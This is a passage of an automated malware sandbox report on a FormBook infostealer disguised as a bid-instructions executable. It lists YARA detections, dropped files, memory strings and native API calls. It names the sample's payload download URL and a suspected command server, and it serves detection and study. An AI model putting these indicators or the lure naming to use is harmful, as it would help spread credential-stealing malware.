78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 7
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 0000000B.00000000.322725214.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: wlanext.exe, 00000010.00000002.520805542.00000000034E9000.00000004.00000001.sdmpString found in binary or memory: http://www.casacampoplayaperu.com
      Source: wlanext.exe, 00000010.00000002.520805542.00000000034E9000.00000004.00000001.sdmpString found in binary or memory: http://www.casacampoplayaperu.com/d76/
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLMEMhh
      Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpW
      Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
      Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpCLMEMp
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp11/
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeString found in binary or memory: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363329409.00000000009A8000.00000004.00000001.sdmpString found in binary or memory: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin&&ze
      Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363329409.00000000009A8000.00000004.00000001.sdmpString found in binary or memory: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.binrt/x
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp, wlanext.exe, 00000010.00000003.472163433.00000000009E7000.00000004.00000001.sdmp, wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1r
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wrep
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
      Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/E

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\730-O-47\730logri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\wlanext.exeDropped file: C:\Users\user\AppData\Roaming\730-O-47\730logrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.520702711.000000000336F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000010.00000002.514310291.00000000009AD000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A20 NtResumeThread,LdrInitializeThunk,3_2_1E279A20
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_1E279A00
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_1E279660
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A50 NtCreateFile,LdrInitializeThunk,3_2_1E279A50
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_1E2796E0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,3_2_1E279710
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_1E2797A0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,3_2_1E279780
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,3_2_1E279860
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279840 NtDelayExecution,LdrInitializeThunk,3_2_1E279840
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_1E2798F0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_1E279910
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279540 NtReadFile,LdrInitializeThunk,3_2_1E279540
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2799A0 NtCreateSection,LdrInitializeThunk,3_2_1E2799A0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2795D0 NtClose,LdrInitializeThunk,3_2_1E2795D0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279610 NtEnumerateValueKey,3_2_1E279610
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A10 NtQuerySection,3_2_1E279A10
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279670 NtQueryInformationProcess,3_2_1E279670
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279650 NtQueryValueKey,3_2_1E279650
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A80 NtOpenDirectoryObject,3_2_1E279A80
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2796D0 NtCreateKey,3_2_1E2796D0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279730 NtQueryVirtualMemory,3_2_1E279730
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279B00 NtSetValueKey,3_2_1E279B00
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27A710 NtOpenProcessToken,3_2_1E27A710
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279760 NtOpenProcess,3_2_1E279760
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279770 NtSetInformationFile,3_2_1E279770
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27A770 NtOpenThread,3_2_1E27A770
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27A3B0 NtGetContextThread,3_2_1E27A3B0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279FE0 NtCreateMutant,3_2_1E279FE0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279820 NtEnumerateKey,3_2_1E279820
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27B040 NtSuspendThread,3_2_1E27B040
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2798A0 NtWriteVirtualMemory,3_2_1E2798A0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279520 NtWaitForSingleObject,3_2_1E279520
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27AD30 NtSetContextThread,3_2_1E27AD30
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279560 NtWriteFile,3_2_1E279560
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279950 NtQueueApcThread,3_2_1E279950
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2795F0 NtQueryInformationFile,3_2_1E2795F0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2799D0 NtCreateProcessEx,3_2_1E2799D0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00561019 NtProtectVirtualMemory,LoadLibraryA,3_2_00561019
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056814A LoadLibraryA,NtSetInformationThread,3_2_0056814A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00566519 NtSetInformationThread,3_2_00566519
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00567D0B NtProtectVirtualMemory,3_2_00567D0B
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005606B5 EnumWindows,NtSetInformationThread,3_2_005606B5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568449 NtSetInformationThread,3_2_00568449
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568876 NtSetInformationThread,3_2_00568876
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056086A NtSetInformationThread,3_2_0056086A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056083D NtSetInformationThread,3_2_0056083D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056103D NtProtectVirtualMemory,3_2_0056103D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005608E4 NtSetInformationThread,3_2_005608E4
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005684E4 NtSetInformationThread,3_2_005684E4
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568499 NtSetInformationThread,3_2_00568499
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00560884 NtSetInformationThread,3_2_00560884
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005680A9 NtProtectVirtualMemory,3_2_005680A9
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568150 NtSetInformationThread,3_2_00568150
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056853A NtSetInformationThread,3_2_0056853A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005685D3 NtSetInformationThread,3_2_005685D3
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005669C2 NtSetInformationThread,3_2_005669C2
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005681F2 NtSetInformationThread,3_2_005681F2
